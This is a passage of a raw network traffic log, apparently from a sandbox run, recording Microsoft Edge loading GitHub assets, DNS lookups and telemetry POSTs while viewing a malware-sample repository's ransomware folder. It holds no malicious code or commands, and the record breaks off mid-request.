GEThttps://github.githubassets.com/assets/react-code-view.ab7d8fac328c00e5e0cc.module.cssmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/react-code-view.ab7d8fac328c00e5e0cc.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Wed, 15 Jan 2025 20:57:17 GMT
etag: "0x8DD35A7320E9609"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:55 GMT
age: 796196
x-served-by: cache-iad-kiad7000033-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 7, 326
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5f30123d78460d261f7697ab9a7f7bd3c1db16b7
content-length: 1204
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_lodash-es__Stack_js-node_modules_lodash-es__Uint8Array_js-node_modules_l-4faaa6-4a736fde5c2f.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_lodash-es__Stack_js-node_modules_lodash-es__Uint8Array_js-node_modules_l-4faaa6-4a736fde5c2f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:31 GMT
etag: "0x8DD34DA6E0E2A39"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:55 GMT
age: 1207978
x-served-by: cache-iad-kiad7000090-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 31, 537
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c99d4a9e6f6eb6f370fa2838ae8ad8c88cb40dd4
content-length: 2138
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_lodash-es__baseIsEqual_js-8929eb9718d5.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_lodash-es__baseIsEqual_js-8929eb9718d5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 16 Sep 2024 23:19:54 GMT
etag: "0x8DCD6A6128E8C4A"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:55 GMT
age: 3224791
x-served-by: cache-iad-kiad7000157-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 10750, 512
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7f7a0fde508232cae735c68233679c6d5df37f30
content-length: 2209
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_react-reverse-portal_dist_web_index_js-node_modules_primer_live-region-e-18c5ad-0b67a5a18b33.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_react-reverse-portal_dist_web_index_js-node_modules_primer_live-region-e-18c5ad-0b67a5a18b33.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 05 Dec 2024 15:49:17 GMT
etag: "0x8DD15446086236E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:55 GMT
age: 2925656
x-served-by: cache-iad-kcgs7200123-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 77, 310
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8a2640e922bd20bbe7c64a40ded45734839d2f06
content-length: 6140
-
GEThttps://github.githubassets.com/assets/ui_packages_copilot-chat_utils_copilot-chat-types_ts-ui_packages_repos-file-tree-view_repos-f-894be6-9b1a09dc11f6.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/ui_packages_copilot-chat_utils_copilot-chat-types_ts-ui_packages_repos-file-tree-view_repos-f-894be6-9b1a09dc11f6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 29 Jan 2025 14:33:33 GMT
etag: "0x8DD4071E8B97434"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:55 GMT
age: 105909
x-served-by: cache-iad-kiad7000138-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 12, 532
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: bae885060e657a51a5443120e29c0f5b8d602cbc
content-length: 15376
-
GEThttps://github.githubassets.com/assets/ui_packages_diffs_diff-parts_ts-aafebbecabf5.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/ui_packages_diffs_diff-parts_ts-aafebbecabf5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 28 Jan 2025 01:30:47 GMT
etag: "0x8DD3F3B6428BB7A"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:55 GMT
age: 105909
x-served-by: cache-iad-kcgs7200059-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 10, 541
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8b965947d8dbb2dd7dcdfa8031fc15fdc38b96e1
content-length: 3566
-
Remote address:185.199.109.154:443RequestGET /assets/react-code-view-43a423a35a1c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 29 Jan 2025 15:23:03 GMT
etag: "0x8DD4078D315FFE9"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:55 GMT
age: 105909
x-served-by: cache-iad-kiad7000125-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 10, 535
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0bdf3ef5c61b13859143b403f0a57ef1d8b3b783
content-length: 66674
-
Remote address:8.8.8.8:53Requestuser-images.githubusercontent.comIN AResponseuser-images.githubusercontent.comIN A185.199.109.133user-images.githubusercontent.comIN A185.199.111.133user-images.githubusercontent.comIN A185.199.108.133user-images.githubusercontent.comIN A185.199.110.133
-
Remote address:8.8.8.8:53Requestprivate-user-images.githubusercontent.comIN AResponseprivate-user-images.githubusercontent.comIN A185.199.111.133private-user-images.githubusercontent.comIN A185.199.108.133private-user-images.githubusercontent.comIN A185.199.109.133private-user-images.githubusercontent.comIN A185.199.110.133
-
Remote address:8.8.8.8:53Request133.109.199.185.in-addr.arpaIN PTRResponse133.109.199.185.in-addr.arpaIN PTRcdn-185-199-109-133githubcom
-
Remote address:8.8.8.8:53Request154.109.199.185.in-addr.arpaIN PTRResponse154.109.199.185.in-addr.arpaIN PTRcdn-185-199-109-154githubcom
-
Remote address:8.8.8.8:53Requestcollector.github.comIN AResponsecollector.github.comIN CNAMEglb-db52c2cf8be544.github.comglb-db52c2cf8be544.github.comIN A140.82.112.22
-
Remote address:185.199.109.154:443RequestGET /favicons/favicon.svg HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: bYAvaN8MCaSZfP0o7q/Z/w==
last-modified: Wed, 14 Aug 2024 19:18:58 GMT
etag: "0x8DCBC95F2647EDF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 206
x-served-by: cache-iad-kiad7000081-IAD, cache-lcy-eglc8600099-LCY
x-cache: HIT, HIT
x-cache-hits: 2163632, 2
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: dd371b97ec05ceb6e2c923a086bd04d289c84cac
content-length: 959
-
Remote address:185.199.109.154:443RequestGET /assets/apple-touch-icon-144x144-b882e354c005.png HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-md5: YDrNCDxuYozaAYS2sPzvIQ==
last-modified: Wed, 14 Aug 2024 19:49:39 GMT
etag: "0x8DCBC9A3C0EF02F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 4190698
x-served-by: cache-iad-kiad7000023-IAD, cache-lcy-eglc8600099-LCY
x-cache: HIT, HIT
x-cache-hits: 381, 20934
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1cc34c122c968f8ed5df54d5fff4d6561d8519a0
content-length: 14426
-
Remote address:185.199.109.154:443RequestGET /favicons/favicon.png HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: NG4JRxNi8pB1EKMYEhKc0g==
last-modified: Wed, 14 Aug 2024 19:18:46 GMT
etag: "0x8DCBC95EB57AC96"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 127
x-served-by: cache-iad-kiad7000070-IAD, cache-lcy-eglc8600099-LCY
x-cache: HIT, HIT
x-cache-hits: 3969931, 2
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 93e7aed97a1333c92b540c85974b82d8efbbd232
content-length: 958
-
Remote address:185.199.109.154:443RequestGET /images/gravatars/gravatar-user-420.png?size=40 HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: J4WxvtrtOWJpKhhQpMUPqg==
last-modified: Wed, 14 Aug 2024 19:20:19 GMT
etag: "0x8DCBC9622FDA663"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:04:09 GMT
age: 101
x-served-by: cache-iad-kiad7000066-IAD, cache-lcy-eglc8600099-LCY
x-cache: HIT, HIT
x-cache-hits: 1627557, 1
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 835606668dd887416834f0d1635c4cdd94eb27e4
content-length: 5065
-
Remote address:8.8.8.8:53Requestapi.github.comIN AResponseapi.github.comIN A20.26.156.210
-
Remote address:140.82.112.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1076
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002784
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: DA58:106581:28BE5A:340438:679BF749
-
Remote address:140.82.112.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 2466
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002944
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: DA58:106581:28BE5A:340437:679BF749
-
Remote address:140.82.112.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 2535
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003736
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: DA58:106581:28C057:34069F:679BF749
-
Remote address:140.82.112.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 2615
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002431
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: DA58:106581:28C08C:3406EB:679BF74A
-
Remote address:140.82.112.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1125
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003400
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: DA58:106581:28C1CA:340878:679BF74A
-
Remote address:140.82.112.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 2649
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002502
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: DA58:106581:28C259:340928:679BF74B
-
Remote address:140.82.112.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1174
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003478
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: DA58:106581:28DC1C:342946:679BF74B
-
Remote address:140.82.112.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1185
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003363
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: DA58:106581:28DC25:342950:679BF759
-
Remote address:140.82.112.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 2704
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003217
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: DA58:106581:28DC3B:34296B:679BF759
-
Remote address:20.26.156.210:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 498
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
